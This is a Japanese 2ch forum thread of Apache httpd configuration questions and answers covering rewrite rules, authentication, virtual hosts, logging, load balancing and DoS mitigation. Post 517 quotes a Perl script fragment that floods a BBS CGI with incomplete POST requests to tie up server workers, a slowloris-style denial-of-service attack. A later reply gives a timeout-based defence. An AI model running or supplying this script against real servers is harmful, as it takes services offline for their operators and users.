10/06/18 07:15:55
質問です。

友人の鯖で、cssが遅いです。

Fedora12
apache 2.2.15

GET hoge.css
をすると、
?/p?$???E??稟@?@??凄w?1??P狒9??LP ?s??HTTP/1.1 200 OK
Date: Wed, 16 Jun 2010 22:00:12 GMT
Server: Apache/2.2.15

1行目が文字化けの余計なレスポンスが
結局cssは適用されるんだけど、読み込むまでに15秒とか掛かっています。

mime.type と 文字コードの確認はしました。
後考えられる原因は何があるでしょうか?
宜しければ教えて下さい。お願い致します。

378:名無しさん@お腹いっぱい。
10/06/26 18:48:52
こういうURLを
URLリンク(aaaa.net)

のように置き換えるにはどうしたらいいでしょうか?


URLリンク(aaaa.net)

379:名無しさん@お腹いっぱい。
10/07/08 15:33:52
>>378
小学生レベルだな
RewriteRule ^/uploda/img/aaa(.*)\.jpg /uploda/index.php?=$1

380:名無しさん@そうだ選挙に行こう
10/07/10 06:09:14
つーか、そもそもの順序が逆だと思うのは俺だけかなぁ・・・

381:378
10/07/10 06:24:19
>>379
ありがとう!!!

382:名無しさん@そうだ選挙に行こう
10/07/11 09:09:43
>>380
俺も見たとき思ったw

>>378
これ変換前後が逆じゃね?

383:名無しさん@そうだ選挙に行こう
10/07/11 15:04:36
URLリンク(aaaa.net)



URLリンク(aaaa.net)

RewriteRule ^/uploda/img/aaaa(.*)\.jpg /uploda/index.php?=$1

*********************

URLリンク(aaaa.net)



URLリンク(aaaa.net)

RewriteRule ^/uploda/img/index.php?=(.*) /uploda/img/aaaa$1.jpg

かな?


384:名無しさん@そうだ選挙に行こう
10/07/11 18:53:17
要求は 989141 であって 98914 ではないんだから、それではうまくいかないのでは?


385:名無しさん@そうだ選挙に行こう
10/07/11 19:00:26
ただの脱字だと思うけどね

386:名無しさん@そうだ選挙に行こう
10/07/11 22:01:42
変換前後が逆だと思ってる香具師は素人

387:名無しさん@お腹いっぱい。
10/07/12 07:29:27
>>378
そろそろ正解を。

388:名無しさん@お腹いっぱい。
10/07/12 09:56:28
>>386
つまり画像ファイルへ直リンされたときはcgi経由のURLに自動的に戻し
アダルト広告を表示させたい、とあなたはそう仰っているわけですね?(キリッ

389:名無しさん@お腹いっぱい。
10/07/12 13:43:18
>>388
わざわざ出てきて、無知な素人だと必死でアピールしなくても良いぞ。
素人は引っ込んでろよ。www

390:名無しさん@お腹いっぱい。
10/07/12 18:33:35
素人はきっと画像ファイルがそこにあるという先入観が取れないんだろうな


391:名無しさん@お腹いっぱい。
10/07/13 22:23:12
RewriteRuleって、Locationセクション内に
書けないんだっけ?
マニュアルだけ見ると、できなさそうな
感じなんだけど…。



392:名無しさん@お腹いっぱい。
10/07/13 22:30:03
書けるけど、書かないほうがいい

393:名無しさん@お腹いっぱい。
10/07/14 13:00:49
>>392
どうして?
書けるなら書こうと思ったんだけど。
サイト別にアクセス制限したくて。


394:名無しさん@お腹いっぱい。
10/07/14 16:23:33
ヒント:
  無限ループ

395:名無しさん@お腹いっぱい。
10/07/14 19:10:59
>>394
もうひとこえ!


396:名無しさん@お腹いっぱい。
10/07/14 19:17:13
ヒント:
  こわくね?

397:名無しさん@お腹いっぱい。
10/07/14 19:25:58
無限ループは発生しないだろ。発生するというなら実例示してよ。

398:名無しさん@お腹いっぱい。
10/07/14 23:33:06
LocationとかDirectory内(ディレクトリコンテキスト)に書くより、
トップレベルとかVirtualHost内(サーバーコンテキスト)に書くほうがはるかに簡単

399:名無しさん@お腹いっぱい。
10/07/20 01:02:03
apache3て何がいいの?
今は2.2を使ってるけど

400:名無しさん@お腹いっぱい。
10/07/20 12:46:26
あれ、2.4のために開発中の2.3を放置していきなり3?

401:名無しさん@お腹いっぱい。
10/07/21 18:51:48
>>398
そりゃあそうなんだけど。

>サイト別にアクセス制限したくて。
とか書きにくいところが困りもの。
トップレベルとVirtualHostセクションは
一回しか書けないんで、記述の
整理がやりにくい。



402:名無しさん@お腹いっぱい。
10/08/04 23:58:52
Ubuntu 10.04 に apt で Apache2.2 をインストールしました。
そのあと以下を見て viewvc をインストールしました。
URLリンク(d.hatena.ne.jp)

現在、URLリンク(example.jp) とアクセスすると
自分の Subversion リポジトリを見ることが出来ます。

質問:
/cgi-bin/viewvc.cgi にアクセスが来たときだけBasic認証を掛けたい。
/cgi-bin/hoge.cgi など、viewvc.cgi 以外の cgi にアクセスが来たときは、
これまで通り認証は掛けたくない。
これを実現するにはどのように httpd.conf を書けばいいでしょうか?

403:名無しさん@お腹いっぱい。
10/08/05 00:00:22
>>402 の続き:
/etc/apache2/sites-available/default は以下のようになっていて
(apt で apache をインストールした直後)
「ここから追記した」というブロックを追記した後、
URLリンク(example.jp) にアクセスしても認証ダイアログが出ませんでした。

<Directory "/usr/lib/cgi-bin"> のところで AllowOverride None しているから?

<VirtualHost *:80>
 ServerAdmin webmaster@localhost

 DocumentRoot /var/www
 <Directory />
  Options FollowSymLinks
  AllowOverride None
 </Directory>
 <Directory /var/www/>
  Options Indexes FollowSymLinks MultiViews
  AllowOverride None
  Order allow,deny
  allow from all
 </Directory>



404:名無しさん@お腹いっぱい。
10/08/05 00:00:40
>>403 の続き:

 ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
 <Directory "/usr/lib/cgi-bin">
  AllowOverride None
  Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
  Order allow,deny
  Allow from all
 </Directory>                       ←ここまで apt でインストールしたときのままの状態

 <Directory "/usr/lib/cgi-bin/viewvc.cgi">    ←ここから追記した
  AuthType Basic
  AuthName "Subversion Repository"
  AuthUserFile /etc/apache2/hoge.passwd
  require valid-user
 </Directory>


405:名無しさん@お腹いっぱい。
10/08/05 02:55:09
>>404
Files

406:名無しさん@お腹いっぱい。
10/08/28 16:13:56
FreeBSD6.2, Apache1.3.42, PHP5.3, Python2.7にてmod_pythonがsegmentasion Faultで落ちました。

んで、mod_wsgiをインストールしようとしたのですが、Pythonを--without-thread指定しないとコンパイルが通りません。
--without-threadを付けてPythonをインストール後、mod_wsgiをインストールしようとすると、PythonのThredを有効にしてインストールしろと怒られます。

何か解決方法はありますか…?orz

407:名無しさん@お腹いっぱい。
10/08/28 16:28:21
FreeBSD6(ry 査読中止。

408:名無しさん@お腹いっぱい。
10/08/28 18:04:20
もちけつ

409:406
10/08/28 21:14:25
あー、うん。

FreeBSD8.0, Apache2.2.16, PHP5.3, MySQL5.1, Python2.7, mod_wsgi3.3 で動きました。

あー、うん、うん、うん…。orz


410:378
10/09/19 03:41:24
自宅サーバー1台
フレッツ光ネクスト回線1本
ルーターは使わずPPPoEで接続しています。

で今使っているプロバイダ1社
これをもう1社追加して、マルチセクション(URLリンク(www.daifukuya.com))で
自宅サーバーのAフォルダを回線Aに、Bフォルダを回線Bに割り当てしたいのですが、
サーバー側の設定としてどうしたらいいでしょうか?

どうぞよろしくお願いしますm(__)m

411:名無しさん@お腹いっぱい。
10/09/19 07:35:13
セッションとセクションの違いがわかる大人になってから出直してください。

412:410
10/09/19 08:22:56
マルチセッションですね
分かる方いらっしゃいましたらお願いしますm(__)m

413:名無しさん@お腹いっぱい。
10/09/19 08:35:51
>>378
IPベースのバーチャルホストを使う

414:名無しさん@お腹いっぱい。
10/09/19 08:37:20
>>410
apache あんまり関係ない...
OS のポリシールーティング+αや
ブロードバンドルータならNATで
別ポートで動かした apache 2つにつなげればいいんじゃね

415:名無しさん@お腹いっぱい。
10/09/19 08:38:58
OS でPPPoEセッション張ってるならIPベースは確かにいけるね


416:名無しさん@お腹いっぱい。
10/09/19 08:40:38
OS という表現は変だな
サーバマシンでってことで。

ついでに、サーバマシンに2IP ふれば
ルーターかましててもIPベースだけで
ことが足りるのかな

417:名無しさん@お腹いっぱい。
10/09/19 08:53:46
まてよ、PPPoEってことはiPアドレス不定だから設定ファイルにIPアドレスを書けないな。
その辺は工夫が必要だ。たとえばiptableで固定のIPアドレスに転送するとか、
設定ファイルを動的に書き換えるようにするとか。

418:410
10/09/20 13:07:30
皆さんありがとうございます
>>413のいうバーチャルホストで振り分けする方式にしました

419:Perl忍者 ◆M5ZWRnXOj6
10/09/26 17:54:29
mod_perlをubuntu10.01にいれた

... waiting .[Sun Sep 26 17:52:00 2010] [warn] module perl_module is already loaded, skipping

これは読み込まれてるのわかってる
他の場所でよみこまれてる

ここで再読み込みしてる
LoadModule perl_module /usr/lib/apache2/modules/mod_perl.so

<IfModule mod_perl.c>
AddHandler perl-script .cgi
PerlHandler ModPerl::Registry
PerlSendHeader On
</IfModule>


だけど
#LoadModule perl_module /usr/lib/apache2/modules/mod_perl.so
でコメントアウトして

ENVのSERVER_SOFTWAREみても

SERVER_SOFTWARE:Apache/2.2.14 (Ubuntu)
ってだけ
mod_perlってでない 読み込まれてちゃんとロードされてるのにmod_perl
なんでSERVER_SOFTWARE二表示されない おしえて


420:Perl忍者 ◆M5ZWRnXOj6
10/09/26 17:57:24
libapache2-mod-perl2はいれてあるよ

421:名無しさん@お腹いっぱい。
10/09/26 18:39:14
ServerTokens じゃないよなまさか・・?

422:Perl忍者 ◆M5ZWRnXOj6
10/09/26 20:01:11
サーバー友君だった・・・
無駄にわけやがってファイルきもい
conf.d/securityにかかないときかなかった

423:名無しさん@お腹いっぱい。
10/11/14 18:08:47
ログフォーマットについて質問します。
今ログは
isp.example.com - - [14/Nov/2010:18:05:25 +0900] "GET /foo.htm HTTP/1.1" 200 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
のような形式なのですが、
GET /foo.htm ではなく GET URLリンク(example.net)
のようにドメインまで表示するようにするには
どうすればいいのでしょうか?

424:名無しさん@お腹いっぱい。
10/11/14 23:16:29
>>423
よく嫁
URLリンク(httpd.apache.org)

425:名無しさん@お腹いっぱい。
10/11/15 02:14:16
>>424
ありがとうございます


426:名無しさん@お腹いっぱい。
10/12/15 13:52:06
2.2.17のapr_pstrdupにバグ
apr_pallocが確保したメモリは初期化されていない → memcpy(NULL文字コピーされず)

427:名無しさん@お腹いっぱい。
10/12/15 14:06:33
と思ったけど、NULL文字列までコピーしてたので違ったorz

428:名無しさん@お腹いっぱい。
10/12/17 17:46:15
> NULL文字
これだけで、超初心者とわかるから報告しなくて良いよ。

> NULL文字列
更笑

429:名無しさん@お腹いっぱい。
10/12/19 13:48:05
loadbalancerってapacheのmod_proxy_balancerとipvsadmってどっちがいいの?

430:名無しさん@お腹いっぱい。
10/12/19 14:51:28
>>429
用途が違う

431:名無しさん@お腹いっぱい。
10/12/19 18:26:06
>>430
kwsk

432:名無しさん@お腹いっぱい。
10/12/19 18:31:09
>>431
少しはググれよ

433:名無しさん@お腹いっぱい。
10/12/20 09:27:50
知らないなら黙ってろよ

434:名無しさん@お腹いっぱい。
10/12/21 02:35:23
>>431
レイヤー

435:名無しさん@お腹いっぱい。
10/12/21 04:07:45
適等なことを書き散らかせばいい

436:名無しさん@お腹いっぱい。
10/12/22 05:10:02
mod_proxyとLVSを比較して「どっちがいいの?」というような質問をするということは
冗長化や負荷分散に関してほとんど知識がない人ということだから、推奨するとすればmod_proxyのほうでしょう
もっといえばmod_proxyを使いこなすのは難しいでしょうから、おすすめとしてはpoundです

437:名無しさん@お腹いっぱい。
10/12/22 10:18:51
いや、そういう人へのオススメは「アウトソースしろ」でしょ。


438:名無しさん@お腹いっぱい。
10/12/22 10:25:20
コンサルタントを雇いましょう。

439:名無しさん@お腹いっぱい。
11/01/20 23:46:47
mod_pythonをいれてpythonを動かしいます。
httpd.confで
PythonHandler test
にして、test.pyを動かしているのですが、このようにファイル名をいちいち指定しないで動かすにはどうしたらいいでしょうか?

440:名無しさん@お腹いっぱい。
11/01/21 02:50:34
mod_rewrite

441:名無しさん@お腹いっぱい。
11/01/23 18:47:18
質問です。
Apacheのaccess_logの見方についてですが、以下の304はなんと表現するのが正しいのでしょうか?

xxx.xxx.xxx.xxx - test [23/Jan/2011:18:16:15 +0900] "GET /test.css HTTP/1.1" 304 -

順番に
アクセスしてきた相手のIPアドレス
認証があった場合に使用されたユーザID
アクセスされたサーバ時刻
GETはリクエストヘッダー、GET方式での呼び出し
/test.cssはファイル名、
HTTP/1.1はプロトコルバージョン
304は・・・??

よろしくお願いします。

442:名無しさん@お腹いっぱい。
11/01/23 18:51:47
HTTPステータスコード

443:名無しさん@お腹いっぱい。
11/01/23 18:54:14
もしかして304ってキャッシュ呼び出しですかね?
例えば304のかわりに200で後ろが-でなく数値があれば、リクエスト通って、実際に送出したデータ量(バイト)

という認識でOKですよね。自己解決しました

444:名無しさん@お腹いっぱい。
11/01/23 18:57:13
なぜ規格書(RFC)にあたらないのだ? 死んだ曾々爺さんの遺言か?

445:名無しさん@お腹いっぱい。
11/01/24 11:51:23
遺言のことよくご存知ですね。
そうなんですよ。

446:名無しさん@お腹いっぱい。
11/02/11 12:16:18
grep MSIE access_log | sed -e 's/.*\(MSIE [0-9\.]*\).*/\1/' | sort | uniq -c | sort -rn

447:名無しさん@お腹いっぱい。
11/03/17 18:20:00.70
自宅サーバで動的DNSをしていると
再起動したあとにIPアドレスが変わり名前と違うようになるみたいで
apacheが立ち上がったときに https だけがこけています。(httpはOK)

その後落ち着いてから apache を再起動すると https もうまく起動します。
これを最初から https もこけずに起動できるようにするにはどうすればよいでしょうか。

448:名無しさん@お腹いっぱい。
11/03/17 18:35:59.29
ちょっと sleep してから上げる、とか。

449:名無しさん@お腹いっぱい。
11/03/17 18:37:38.43
pppのリンクアップでrestartとかどーよ?

450:名無しさん@お腹いっぱい。
11/03/17 18:52:24.06
ServerName書くだけで済むんじゃね。

451:名無しさん@お腹いっぱい。
11/03/17 18:53:23.39
IPv4ならNATで内部用固定アドレスに向かわせて
Apacheはその固定アドレス:443をListenさせるとかw

IPv6はどう対処させようか。
サーバなのにtempaddrで運用するってのもアレだけどw

452:名無しさん@お腹いっぱい。
11/03/17 18:54:54.93
笑うほどのことか?

453:447
11/03/17 19:07:02.36
ServerName をかくといけたようです。様々なアイデアありがとうございました!

454:名無しさん@お腹いっぱい。
11/03/24 00:54:18.21

【2ch激論】ダム板が統合・廃止へ!人気スレ「また騙されてダム板に…」がなくなる?
スレリンク(river板)


455:名無しさん@お腹いっぱい。
11/04/23 20:14:19.39
apache 1.3系の頃はBASIC認証の失敗時にも
ログにそのユーザ名が記録されていたんだけど
2.2系に変更したら失敗時は"-"と記録されるようになった。
2.2でも1.3のようにログすることってできないかな?

456:名無しさん@お腹いっぱい。
11/04/25 01:52:04.73
>>455
マジで?そうだとすると、マニュアルに書いてあることが間違ってるね

URLリンク(httpd.apache.org)
>リモートユーザ (認証によるもの。ステータス (%s) が 401 のときは意味がないものである可能性がある)

457:名無しさん@お腹いっぱい。
11/04/25 21:21:40.24
2.2.17 で試してみたけど、そんなことない。
ユーザにプロンプトが出る前に一回 401 が返るけどそのログと見間違えてる?
mod_log_config.c の log_remote_user を見ても、- になるのは NULL のときだよ。

458:名無しさん@お腹いっぱい。
11/04/25 22:55:22.44
>>456
うん、マニュアルと一致しなくておかしいなぁ、と思ってた。

>>457
う~ん、なんでだろう。見間違いはないんだけよね。
でもうち以外では挙動が違うってのはうれしい情報。
もうちょっと調べてみる。


459:名無しさん@お腹いっぱい。
11/05/10 12:06:13.87
質問させてください。
apacheのプロセス番号からアクセスしているURLを調べることってできますでしょうか?
ご教示いただけると幸いです。

460:名無しさん@お腹いっぱい。
11/05/10 12:28:09.56
mod_status


461:名無しさん@お腹いっぱい。
11/05/10 23:43:44.84
strace

462: 忍法帖【Lv=4,xxxP】
11/05/17 13:18:40.00
ErrorDocument 404 /usr/home/foo/bar/404.html
のように、ローカルの絶対パスで指定ってできないんでしょうか?

環境httpdバージョン2.2

463:名無しさん@お腹いっぱい。
11/05/17 13:23:28.77
できるよ。

464:名無しさん@お腹いっぱい。
11/05/17 13:24:02.24
あ、だめか。
URLリンク(httpd.apache.org)

465:名無しさん@お腹いっぱい。
11/05/17 23:46:14.18
>>462
先に
Alias /404.html /usr/home/foo/bar/404.html
すればよくね?


466: 忍法帖【Lv=4,xxxP】
11/05/18 05:00:26.65
>>465
そうやるしかなさそうですね。ありがとございます。

467:名無しさん@お腹いっぱい。
11/05/22 23:13:08.31
>>459
モジュール内部でgetpidとrequest_recみてやればいい。

468:名無しさん@お腹いっぱい。
11/05/25 15:58:06.65
質問です。
マルチポストすみません。

以下の設定が前提です。

■ ディレクトリ構成(一部抜粋)
/var/www/hoge
/var/www/hoge/hage
/var/www/hoge/hage/hige

■ httpd.conf(一部抜粋)
DocumentRoot /var/www/html

Alias /hage /var/www/hoge/hage
<Directory "/var/www/hoge/hage">
SSLRequireSSL
ErrorDocument 403 "SSL Require -> https://"
AllowOverride All
Order allow,deny
Allow from all
</Directory>

【やりたいこと】
ディレクトリ /hage「だけ」に SSL をかけたいです。

【こまっていること】
上記設定ですと、/hage/hige にも SSL がかかってしまいます。
/hage にだけ SSL をかけることはできますでしょうか?
(そもそもの設定が間違っている可能性大ですが)
よろしくお願いいたします。

469:名無しさん@お腹いっぱい。
11/05/25 16:04:36.04
マルチポストはしないでください。

470:名無しさん@お腹いっぱい。
11/05/27 21:19:19.24
VirtualHostを複数立てて、どれのServerNameにもマッチしないときには
一番上に書いたものにマッチするそうですが、これを拒否する方法はありますか?

471:名無しさん@お腹いっぱい。
11/05/27 21:34:58.88
一番上で拒否すればええやん


472:名無しさん@お腹いっぱい。
11/05/31 11:34:45.66
/home/test/public_html/ ディレクトリと
/home/test/admin/test.cgi というファイルがあってこのtest.cgiを
実行させたいんですが、以下のようにすると client denied by server
configuration で動きません。

<VirtualHost 123.123.123.123:80>
DocumentRoot /home/test/public_html
ServerName www.test.com
ScriptAlias /ugoke/ "/home/test/admin/"
</VirtualHost>

/home/test/public_html/test.cgi に置くと問題なく動くんですが
ScriptAliasはDocumentRootの下を指定しないといけないんでしょうか?

Apache1.3系だと上のような設定で動いているんですが・・・
今は2.0.64です。

473:名無しさん@お腹いっぱい。
11/05/31 11:42:53.97
> ScriptAliasはDocumentRootの下を指定しないといけないんでしょうか?
そんなことはない。注意事項がマニュアルに書いてある。
マニュアルも読まない奴はサーバー管理しちゃいけないというトラップ。

474:名無しさん@お腹いっぱい。
11/05/31 12:38:12.94
ホントだ・・・ScriptAliasの箇所だけみてた。
ありがつ。

475:名無しさん@お腹いっぱい。
11/06/02 20:11:56.10
microformatsのrel-tagを使うためにはapahceで何か設定が必要ですか?
ググっても何も出てこないよ

476: 忍法帖【Lv=3,xxxP】
11/06/03 15:35:07.41
age

477:名無しさん@お腹いっぱい。
11/06/03 23:19:38.09
HTMLでそう書けばいいだけの話なのでApacheは関係してこないと思うが。

478:240
11/06/04 13:40:48.27

         ____
       /      \
     /  _ノ  ヽ、_  \
    /  o゚⌒   ⌒゚o  \   今日もまた、
    |     (__人__)    |  /usr/local/apache2/bin/apachctl start
    \     ` ⌒´     /   を打ち間違える仕事が始まったお…

479:名無しさん@お腹いっぱい。
11/06/04 21:06:20.75
>>477
HTMLで記述してもうまく動かないからサーバーの方に問題があるのかと思いまして・・・

480:名無しさん@お腹いっぱい。
11/06/05 00:33:34.28
>>479のおつむに問題があるのは確かだな

481:名無しさん@お腹いっぱい。
11/06/06 20:24:12.23
debianでapache2をインストール後間違ってapache2を削除してしまい、再度インストールしようとすると
「Sub-process /usr/bin/dpkg returned an error code」
と出てしまいます。
どうしたら再インストール出来るか教えてください。

482:名無しさん@お腹いっぱい。
11/06/06 20:28:52.63
でびあんから再インストールすれば良いよ。

483:名無しさん@お腹いっぱい。
11/06/06 20:41:33.54
>>482
1から設定しなおすのが大変なので他にないでしょうか?

484:名無しさん@お腹いっぱい。
11/06/06 21:12:18.11
あるだろうけど、適切な場所で質問しなけりゃ解は得られないだろうね。

485:名無しさん@お腹いっぱい。
11/06/06 23:00:39.10
たぶん479=481

486:名無しさん@お腹いっぱい。
11/06/08 21:01:28.15
apacheとmod_wsgiでアプリケーションを動かしています。
ログイン情報などをsessionで保存しているのですが、これを一度クリアすることってできますか?

487:名無しさん@お腹いっぱい。
11/06/10 06:07:56.31
>>481
その an error code がなんなのかわからないと答えようがないと思うが。

488:名無しさん@お腹いっぱい。
11/06/10 11:27:48.64
Debian 限定の話は Debian スレへ。

489:名無しさん@お腹いっぱい。
11/06/16 04:07:49.48
スレ違いかもしれませんがmod_Jkのフェイルオーバについて知っている方がいたら教えてください。
Webサーバ2台、APサーバ2台で構成しており、workers.propertiesは
以下のものがWebサーバ2台ともに入っています。

===
worker.list=wlb

worker.w1.type=ajp13
worker.w1.host=192.168.0.201
worker.w1.port=8009
worker.w1.redirect=w2

worker.w2.type=ajp13
worker.w2.host=192.168.0.202
worker.w2.port=8009
worker.w2.activation=disable

worker.wlb.type=lb
worker.wlb.balance_workers=w1,w2
worker.wlb.sticky_session=True
===

w1がダウンし続けた場合、mod_jkは定期的にw1にリクエストを送り、失敗したのちまたw2にフェイルオーバするという仕様になっているのでしょうか?
recovery_optionの設定も見たのですが、デフォルトが0ということでこの場合にどのような動作になるのかがわかりません。


環境は以下の通りです。
Fedora12
Apache2.2
mod_jk1.2.30

よろしくお願いいたします。

490:名無しさん@お腹いっぱい。
11/06/22 22:02:32.13
mod_rpaf がダウンロードできなくなってるんだけど、
URLリンク(stderr.net)
誰かミラー知ってる人いませんか?


491:名無しさん@お腹いっぱい。
11/06/24 18:13:00.70
見つからないね。
違ってると思うけど、mod_extract_forwarded ではダメ?・・・だよね

492:名無しさん@お腹いっぱい。
11/06/24 18:50:42.93
みっけ
fURLリンク(ftp.freebsd.org)

493:名無しさん@お腹いっぱい。
11/06/25 10:20:58.37
おー 頭いいな

494:名無しさん@お腹いっぱい。
11/06/25 10:49:30.95
検索してたら ports の Makefile が引っかかったから、
どっかにあると思ってたけど 492 さんには本当に感謝。
自分も昨日から急遽 source が必要になったから焦ってた。


495:名無しさん@お腹いっぱい。
11/07/04 18:37:48.03
mod_rewriteの設定数に上限はありますでしょうか
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-d
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-f
RewriteRule ^/item/(.*)\.html /item/detail.php?id=$1 [P,QSA,NE,L]

このような設定がサイトごとに3つあり、10サイト稼働しています
サイトを増やしたところ$1が空でした
ログを見ると条件にマッチしてましたが、$1が空になってしまうのです
他のサイトを一時的に消したところ、なぜか期待通りの動きになりました
apacheのバージョンは2.2.9です
何かお分かりになりますでしょうか

496:名無しさん@お腹いっぱい。
11/07/04 19:33:55.08
mod_rewriteってのはそれ以外の手段がまったくない場合にかぎって
しかたなく使うのが許されるウンコであって、
それを通常運用としてしまうのはウンコ以下。
ウンコの限界を極めるウンコ仕事をするよりも、
ウンコを使わないで済むようにスクリプトの方を修正した方がいい。

具体的には、
AliasMatch ^/item/.*\.html /item/detail.php
として、呼ばれたURLから.*の部分を拾うようdetail.phpを書き換える。


497:名無しさん@お腹いっぱい。
11/07/09 01:11:49.14
Apache2.2を使って、ホワイトリスト型のフォワードプロキシ
(事前に指定したサイトしかアクセスできないように設定)
を作ろうとしているのですが、設定が上手くいかないです。

下記、例としてyahooおよびgoogleのみアクセスを許可して、
それ以外のサイトをアクセス拒否させる目的で設定しましたが、
一番上のアクセス拒否の設定が優先されてしまうため、
全てのサイトへのアクセスが拒否されてしまいます。

●現在の設定例(一部抜粋)
<Proxy *>
Order deny,allow
Deny from all
</Proxy>

<Proxy URLリンク(www.yahoo.co.jp)
Order allow,deny
Allow from all
</Proxy>

<Proxy URLリンク(www.google.co.jp)
Order allow,deny
Allow from all
</Proxy>

上記、あて先がyahooとgoogleのみアクセス許可して、
それ以外のサイトへのアクセスを拒否したいのですが、
Apache2.2でそれを行う方法はあるのでしょうか?
(configの記載順による優先順位の問題でしょうか?)

上記、わかる方がいれば、教えていただけると助かります。
よろしくお願いいたします。

498:名無しさん@お腹いっぱい。
11/07/23 18:08:53.11
ApacheのMPM改造したいんだけど。具体的には、バーチャルホストごとに帯域制御をしたい
参考になるサイトとかって無いかな。もしくは、やったことある人いる?

499:名無しさん@お腹いっぱい。
11/07/24 00:56:01.27
ApacheってDos攻撃対策大丈夫なの?

500:名無しさん@お腹いっぱい。
11/07/24 10:34:15.19
というと?

501:名無しさん@お腹いっぱい。
11/07/24 11:36:01.87
Apache自身にやらせたいならmod-dosdetector

502:名無しさん@お腹いっぱい。
11/07/24 12:44:00.71
ソースコード見る限り、mod_evasiveとかmod_dosdetectorとかだと弱いんだよ。
相手からのリクエストを読んでから、遮断するから。

相手が接続だけして、何もデータを送ってこないと接続数がふくれあがるはず。実験してないけど
しかも、遮断する前にスレッドなりプロセスなりを割り当てるから、リソースが無駄。

本来は、acceptした時点でIPアドレスがわかるわけだから、それを振り分ける前に遮断するべき

503:名無しさん@お腹いっぱい。
11/07/24 13:08:54.97
それはファイヤーウォールの仕事では

504:名無しさん@お腹いっぱい。
11/07/24 13:29:08.34
その手があったか。ありがとう

505:名無しさん@お腹いっぱい。
11/07/24 14:18:19.69
URLリンク(httpd.apache.org)

506:名無しさん@お腹いっぱい。
11/07/24 18:05:28.86
なんか無知な学生がレポート書きの手伝いを求めてるようなふいんきだな

507:名無しさん@お腹いっぱい。
11/07/24 20:34:50.64
>>506
そんな感じですね。

ぼんやりしたやり取りがたまらないw

508:名無しさん@お腹いっぱい。
11/07/25 00:12:09.07
うちは帯域制御はmod_cband
DoS対策はmod_security
CentOS5.x/Apache2.2.xで安定して使ってるよ


509:名無しさん@お腹いっぱい。
11/07/25 00:22:08.76
たまに刺さってmod_cbandが発狂するので、一時間に一回再起動させて運用してるよ。。
なんか帯域カウンターが戻らなくて溜まってしまう感じ

510:名無しさん@お腹いっぱい。
11/07/25 01:21:57.68
>>509
バグ報告すれば?それかソースコード自分で見れば?
モジュール単体なら、そんなに量多くないから分かるはず

>>505
URLリンク(d.hatena.ne.jp)
ここを参考mpmのソース見ると、ヘッダーを読み込んだあとにしかモジュールのフックをかけられない構造になってる。
だから、mpm改造しちゃえばできるんだけど。モジュール化の意味合いが薄まるから汚いかなって

511:名無しさん@お腹いっぱい。
11/07/25 01:24:03.92
>>505
不完全なのは知ってのことなのか。世界の誰か頑張れよ
俺がもっといいmpm作ろうかな。性能がよければ有名になれるかなwww

512:名無しさん@お腹いっぱい。
11/07/25 02:28:49.74
分離してうまく作れるんじゃないかとあれこれ試行錯誤するが
結局のところモジュール本体に改造を入れることって多いよね。。。

513:名無しさん@お腹いっぱい。
11/07/25 03:15:04.58
>>511
だったら作って有名になってみればいいじゃんw

514:509
11/07/25 10:37:52.60
ソースは追いかけて何処の変数がインクリメントしっぱなしかは確認したけど
複数プロセスで共有してる奴で、どっかで突然死するプロセスが居ればさもありなんて感じ
発生頻度も週一くらいで、何台かで回してるサービスだし面倒


515:名無しさん@お腹いっぱい。
11/07/25 11:56:14.21
2.4 に mod_ratelimit ってのが入るので、先取りしてバージョン上げちゃえ。


516:名無しさん@お腹いっぱい。
11/08/04 07:37:37.77
449 忍法帖【Lv=40,xxxPT】 ◆8huU.uGZBA sage 2011/08/03(水) 15:02:01.85 ID:49.133.48.168 0
サーバへにリクエストが来た時、リクエストを受け取るまでhttpdは待っているわけだ
しかしcontentslength分だけ受け取りたいけど待てど暮らせど送ってこないから
httpd.confのtimeoutするまでそのhttpdプロセスがブロックされるんだな
そしてそれがたーくさんたまる、売り切れまで溜まる
売り切れたらそれ以降のhttpの要求は受け付けなくなる

攻撃がやんだらブロックされているhttpdは順次timeoutで開放され
だんだんいつもの状態に近づく

こうなんじゃないかな?

456 ◆IOT1IIO1ILUU-さる♪ sage 2011/08/03(水) 15:06:18.97 ID:219.106.108.87 0
>>449
大体はそんな感じです。
少し違うのは、Content-Lengthは関係ありません。
中途半端なHTTPリクエストであってもApacheが律儀にTCPのタイムアウトまでリソースを確保して待ってしまうのが原因なので、
それこそTCPで何か少しでもデータを送ってやれば、HTTPリクエストとして完全に破綻していてもApacheは落ちます。
なのでHTTPのヘッダに着目して対策するのは無理です。

517:名無しさん@お腹いっぱい。
11/08/04 07:39:45.57
こんな感じなんだけどどうやったら対策できる?
攻撃元のスクリプトは以下

433 名無しさん@お腹いっぱい。 sage 2011/08/03(水) 14:51:01.84 ID:81.94.203.180 0
スクリプト自体はマルチスレッドでBBS.CGIを叩くだけなんだよな
こんな感じで

my $ref = sub{
while(){
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname( 'tcp'));
connect(SOCK, sockaddr_in("80", $ipaddr));
select(SOCK);
$|=1;
select(STDOUT);

print SOCK "POST /test/bbs.cgi HTTP/1.1\r\n";
print SOCK "Accept: */*\r\n";
print SOCK "Referer: URLリンク($sv)" . "/news/\r\n";
print SOCK "Accept-Language: ja,en;q=0.5\r\n";
print SOCK "Content-Type: application/x-www-form-urlencoded\r\n";
print SOCK "Accept-Encoding: gzip, deflate\r\n";
print SOCK "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)\r\n";
print SOCK "Host: $sv\r\n";
print SOCK "Content-Length: 1\r\n";
print SOCK "Connection: Keep-Alive\r\n";
print SOCK "\r\n";
close(SOCK);

threads->yield();
}
};

518:名無しさん@お腹いっぱい。
11/08/04 10:17:16.26
slowloris 対策なら RequestReadTimeout で。


519:名無しさん@お腹いっぱい。
11/08/04 10:38:02.85
>>518
ありがとう

520:名無しさん@お腹いっぱい。
11/08/07 14:40:43.49
ブラウザでリクエストヘッダーに
Keep-Aliveの時間を指定した場合、どういう時間を指し示すのでしょうか?
Wikipediaを見ていてふと疑問に思いました。

Keepalive time is the duration between two keepalive transmissions in idle condition. TCP keepalive period is required to be configurable and by default is set to no less than 2 hours.
Keepalive interval is the duration between two successive keepalive retransmissions, if acknowledgement to the previous keepalive transmission is not received.

URLリンク(en.wikipedia.org)

